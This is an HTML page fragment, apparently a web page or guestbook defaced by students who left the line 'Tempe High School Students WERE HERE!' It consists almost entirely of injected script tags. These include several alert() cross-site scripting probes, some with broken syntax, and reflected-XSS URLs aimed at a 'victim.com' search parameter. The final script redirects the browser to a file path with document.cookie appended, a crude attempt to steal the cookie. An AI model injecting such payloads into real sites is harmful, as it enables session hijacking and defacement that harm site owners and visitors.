<p>
Tempe High School Students WERE HERE!
</p>
<p>
test1
</p>
<p>
<script>alert(i know you address)</script>
</p>
<p>
<script>alert(i know you address)</script>
</p>
<p>
<script>document.cookie</script>
</p>
<p>
<script>alert("know you address");</script>
</p>
<p>
<script>alert("know you address");</script>
</p>
<p>
https://victim.com/search?q=<script>alert("click here")</script>
</p>
<p>
https://victim.com/search?q=<script>alert("click here")</script>
</p>
<p>

</p>
<p>

</p>
<p>

</p>
<p>
<script>window.location="file:///C:/Users/aiman/Downloads/login.html?cookie=" + document.cookie</script>
</p>
